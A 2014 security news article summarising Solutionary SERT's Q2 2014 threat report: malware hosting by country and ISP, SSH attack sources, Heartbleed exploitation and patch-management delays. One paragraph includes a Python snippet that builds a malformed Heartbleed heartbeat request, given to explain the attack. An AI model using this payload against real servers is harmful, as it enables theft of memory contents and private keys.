
U.S. hosted most Q2 malware, top 10 ISPs still main sources

More than half — 56 percent — of the malware captured in the second quarter of 2014 and analyzed by Solutionary's Security Engineering Research Team was hosted in the United States, according to a recent report.

That figure represented a 12 percent increase from the fourth quarter of 2013, according to the "Q2 2014 SERT Quarterly Threat Intelligence Report." 

Hosting was up in France and Ireland as well as the Virgin Islands, but the increases were more modest, ranging from two to three percent.

While the top 10 ISPs were the source of most malware (51 percent), with Amazon retaining the top spot and accounting for the biggest chunk at 41 percent, Q2 2014 saw GoDaddy slip to ninth position, accounting for just two percent of the captured malware, down from 16 percent.

In the second quarter, smaller providers such as Akrino and Website Welcome saw an increase in hosted malware.

Noting that hosting often shifts from quarter to quarter, Chad Kahl, a threat analyst with Solutionary's SERT, said in an email correspondence that “Jumping from ISP to ISP has been a common tactic to provide cover and obfuscation, and add complexity to forensic investigations for many years.”

The report also found that HTML and Windows executables (PE32) were the file types attackers leveraged most. PE32 alone accounted for 49 percent of the exploits, and when coupled with HTML, the figure rose to 81 percent.

Researchers noted that attackers repeatedly chose SSH as a way to gain administrative access to targets, with China taking the lead, accounting for 45 percent of the attacks, followed by the U.S. at 17 percent. 

Disturbingly, researchers were able to weaponize and exploit the Heartbleed vulnerability in OpenSSL; after 48,000 heartbeat requests, the team extracted a private key. SERT members warned that organizations could mistake the activity generated by tens of thousands of requests for another type of attack, such as denial-of-service (DoS).

The report said that amidst the hoopla surrounding Heartbleed, the aspect "that did not receive much coverage was the effect of exploit attempts on the system."

“When you exploit Heartbleed, 64KB is the maximum amount of random data that can be retrieved with one request. To get the specific piece of data required, an attacker may have to submit millions of requests,” said Kahl. “Millions of requests rapidly being sent to one server can overwhelm many different components, including CPU, NIC, RAM, etc. It would be easy to mistake this activity for a denial-of-service attempt, completely missing that the real attack is exfiltrating data.”
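The 64KB ceiling Kahl mentions comes from the heartbeat message's two-byte payload-length field, which an attacker sets far larger than the payload actually sent; a vulnerable server echoes back that many bytes of its own memory. A minimal sketch of such a malformed request (illustrative only, not the SERT team's tooling; the constants follow the TLS heartbeat format of CVE-2014-0160):

```python
import struct

def build_malicious_heartbeat(claimed_len=0xFFFF):
    """Build a TLS heartbeat request whose claimed payload length far
    exceeds the payload actually sent -- the Heartbleed trick."""
    # Heartbeat message: type 0x01 (request) plus a 2-byte payload length,
    # with no payload bytes following. A vulnerable server echoes back
    # `claimed_len` bytes of process memory (up to 64 KB per request).
    heartbeat = struct.pack(">BH", 0x01, claimed_len)
    # TLS record header: content type 0x18 (heartbeat), version TLS 1.1
    # (0x0302), record length covering only the 3 bytes actually sent.
    record = struct.pack(">BHH", 0x18, 0x0302, len(heartbeat))
    return record + heartbeat

msg = build_malicious_heartbeat()
# Only 8 bytes on the wire, yet it asks for 65,535 bytes in return --
# hence the millions of requests needed to fish out a specific secret.
assert len(msg) == 8
```

Since each response leaks an arbitrary 64KB window of memory, an attacker hunting for one specific secret, such as a private key, must repeat the request at high volume, which is exactly the traffic pattern Kahl warns can be misread as a DoS attempt.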

Despite the uproar over Heartbleed, many organizations continue to use vulnerable versions of SSL for many reasons, Kahl said, noting that two stood out in the course of compiling the second quarter report.

“First, during the research for our 2014 GTIR, we discovered that the average remediation time for vulnerabilities ranges between 146 and 197 days, depending on whether or not they have a VLM program. 146 days…that is almost five months. We also discussed doing the basics versus doing the basics well. Patch management represents a powerful opportunity for improvement in many organizations,” he said. “Secondly, there is the issue of embedded code. Network devices, third party software, and more utilize OpenSSL in their own code to establish secure channels of communication. So now we have to wait for the developer to update their code, which may or may not happen.” 

As a result, “the situation rolls back to my first point, which is having to depend on the patch management procedures to do their job,” added Kahl.
